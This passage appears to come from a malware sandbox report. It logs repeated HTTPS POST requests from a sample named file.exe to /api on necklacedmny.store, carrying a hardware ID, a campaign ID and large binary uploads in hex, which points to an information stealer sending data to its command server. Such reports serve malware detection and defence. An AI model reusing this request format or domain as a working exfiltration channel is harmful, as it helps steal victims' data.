                                                                Data Ascii: PQtbMUc7C0jT6Om+n4no6sAvivD07HfPEQncuCaS6exwFhxXOUsUQsKpwb6bmK6nljSNlorocNIZCNzGVvPnvCVZPmQKeQtCkMrtrYCU6amYbMGOkol7yAQK1IFUtPn7PVdbZ0ckRUTY++qyitfo59hs0oDTiWyCTFSVxgrzu7w6FxZoBHIGV8Dt5KuO3NDX8yHAy8TORPw1DcuLF7Sh3HoPGFc5SxRCwqnBvpuYrqeWNI2Wiuhw0hkI3MQ4tPX


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549707188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:27:53 UTC284OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 12840
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:53 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:27:54 UTC1026INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=koi3l8uubmk9oioptvudi6ksba; expires=Mon, 24-Feb-2025 04:14:33 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=565jWse0Z8TGNtTb5JKp%2FMsw%2F39A2RerJx62w1KhsxfB5nQZhW%2Fe5v284kN%2BNeVjdqSgVKVjzViKLyzNZncBc022QKxHGGP7jPlXrU0yHLaLHbQn%2Fou53Kk1p%2BQz%2F%2FdcaJ8yWUM%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f485fee646ce-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13782&delivery_rate=1735170&cwnd=248&unsent_bytes=0&cid=b22114e67ec9c44c&ts=760&x=0"
                                                                2024-10-31 10:27:54 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549708188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:27:55 UTC284OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 15082
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:55 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:27:55 UTC1014INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=2jkdk5f9er3mema7ov5flj5d5k; expires=Mon, 24-Feb-2025 04:14:34 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aL2ZpLmi0aVckMacL%2BgpJ5PeeD6AD78YKRD6p6gH5f3849UiXf%2BxJp57Yj4kkTHg8ellMQpRAZNAaT2DOsYRaDn3fXgWA2CZ5Tgpzc3Ct9bnxchiztueCrJJorj92AkrxC4qwNU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f48eeec26b41-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2421404&cwnd=250&unsent_bytes=0&cid=5e319a91cc981531&ts=561&x=0"
                                                                2024-10-31 10:27:55 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549709188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:27:56 UTC284OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 20572
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:27:56 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                2024-10-31 10:27:57 UTC1026INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=9q6lsg2qod0hg98kjrlch0mrq2; expires=Mon, 24-Feb-2025 04:14:36 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hph28IEBgp%2B%2F4uk00DaoY8CcVutmfYKklLvmjkHItY8vzo4A7fAuIaM5nm%2F476fsBRAo70MQ96ezLkPfOa%2B%2FulZiADMQkXXiIzTD0DsvMpbVQE7n%2BldwoI%2Fs%2BoSVPWrFZ8VxscQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f497a9f9ddb3-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21536&delivery_rate=2458404&cwnd=73&unsent_bytes=0&cid=eeba379d281e7e3a&ts=672&x=0"
                                                                2024-10-31 10:27:57 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549710188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:27:58 UTC283OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 1237
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:58 UTC1237OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:27:59 UTC1020INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=89p9sgt8v1avlg2dsbru8mgp00; expires=Mon, 24-Feb-2025 04:14:37 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3ULTk5bLdg789F9giEdX%2FBAvGj9IYvRtwFQqzJq6E3cyoBx16pYs5%2FdSM5rODuclmCuyEVa9Phv0yGJzsOhJPSLw9%2FAjWUi4jq%2BmDBiLUsC4Ja8FwTxJBSzhc%2FEUIsq98rvf%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f4a22e8946d4-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2156&delivery_rate=2296590&cwnd=252&unsent_bytes=0&cid=fec1897ecad1465f&ts=793&x=0"
                                                                2024-10-31 10:27:59 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                Data Ascii: 11ok 173.254.250.77
                                                                2024-10-31 10:27:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.549711188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:28:00 UTC285OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 570133
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: fe c0 02 4d 72 02 68 56 18 b8 0c 02 7f 95 56 0c 22 c1 0b 7b a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be 01
                                                                Data Ascii: MrhVV"{Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: d4 2d 58 b5 76 89 c2 5e b0 df 45 0a b0 10 00 77 a8 ea e1 f2 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29 d8
                                                                Data Ascii: -Xv^Ewh1JF^\H*Qy6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|zTG)
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 71 ed df 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06 0a
                                                                Data Ascii: qen;|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 8a 8f 7a bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9 cf
                                                                Data Ascii: zxvDg)rfH\W-*^5vE*!/W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: bc 9d a3 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00 a2
                                                                Data Ascii: = qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: d9 2c 99 a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60 be
                                                                Data Ascii: ,Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5~}`
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: f0 69 cf 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf c8
